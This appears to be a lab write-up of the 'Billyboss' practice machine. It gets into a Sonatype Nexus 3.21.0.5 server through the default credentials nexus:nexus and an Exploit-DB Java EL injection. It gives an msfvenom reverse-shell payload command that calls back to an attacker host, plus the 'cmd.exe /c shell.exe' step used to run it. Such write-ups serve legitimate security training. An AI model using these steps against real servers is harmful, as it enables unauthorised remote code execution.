# Billyboss

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.170.61 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fmvq878Wx5B71mLUFBv4j%2Fimage.png?alt=media\&token=3cddb23e-6104-42bf-b95a-e9f0c9ec11ab)

### Service Enumeration

### HTTP (port 8081)

We see that this is running `Sonatype Nexus Repository Manager 3.21.0.5`.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FBZsnz9ZyGdmW2aM59nHY%2Fimage.png?alt=media\&token=f6c6dc3c-76b3-4703-b75e-3c7bd30530b8)

We can try various different default credentials and find that only `nexus:nexus` works.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Ftd3mVTysbuoyQ5EBFzal%2Fimage.png?alt=media\&token=607c6c16-c462-4a23-ad49-0aba33fb1240)

## Exploit

There is an exploit for Nexus Repository Manager 3 versions 3.21.1 and below which is vulnerable to Java EL injection which allows a low privilege user to gain RCE on the target.

{% embed url="<https://www.exploit-db.com/exploits/49385>" %}

First, we generate our payload using MSF venom.

`msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.170 LPORT=8081`

We then modify the script to download our payload and execute it.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F9aR8KpFil0mBIOVBzl4f%2Fimage.png?alt=media\&token=422d54e5-9684-4ed8-b04a-f924082102cc)

Next, we execute the script and verify that the payload has been downloaded to our target machine.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FD6lP7oiIws76GesyFV6r%2Fimage.png?alt=media\&token=71a2a6fa-cc7f-4c07-b2ec-6227599f3d80)

Next, we change the CMD command to `'cmd.exe /c shell.exe'` and we run the script again.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHi5SYkNSVnjRDrB7cc6F%2Fimage.png?alt=media\&token=e02200d7-7dd1-4a54-a008-e3fd15790845)